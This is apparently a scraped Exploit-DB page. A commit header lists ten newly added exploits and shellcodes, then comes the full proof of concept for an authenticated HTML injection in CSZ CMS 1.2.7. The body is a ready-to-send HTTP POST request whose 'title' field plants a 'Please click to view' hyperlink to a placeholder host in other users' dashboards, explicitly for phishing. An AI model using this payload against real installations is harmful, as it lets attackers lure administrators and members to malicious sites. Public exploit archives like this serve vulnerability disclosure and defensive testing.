1c5c38825d
10 changes to exploits/shellcodes Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation WordPress 2.0.2 - 'cache' Remote Shell Injection Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption WordPress Core 2.0.2 - 'cache' Remote Shell Injection CSZ CMS 1.2.7 - Persistent Cross-Site Scripting PMB 5.6 - 'logid' SQL Injection CSZ CMS 1.2.7 - 'title' HTML Injection IQrouter 3.3.1 Firmware - Remote Code Execution NSClient++ 0.5.2.35 - Authenticated Remote Code Execution jizhi CMS 1.6.7 - Arbitrary File Download P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin) Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)
27 lines
No EOL
976 B
Text
27 lines
No EOL
976 B
Text
# Exploit Title: CSZ CMS 1.2.7 - 'title' HTML Injection
|
|
# Exploit Author: Metin Yunus Kandemir
|
|
# Vendor Homepage: https://www.cszcms.com/
|
|
# Software Link: https://sourceforge.net/projects/cszcms/
|
|
# Version: v1.2.7
|
|
# Description:
|
|
# Authenticated user can inject hyperlink to Backend System Dashboard and
|
|
# Member Dashboard via message.
|
|
|
|
PoC Request:
|
|
|
|
POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1
|
|
Host: localhost
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
|
|
Firefox/60.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Referer: http://localhost/CSZCMS-V1.2.7/member/newpm
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 196
|
|
Cookie: cszcookie
|
|
Connection: close
|
|
Upgrade-Insecure-Requests: 1
|
|
|
|
csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=<h1><b><a href="http://changeme/">Please
|
|
click to view</a></b></h1>&message=phishing&submit=Send |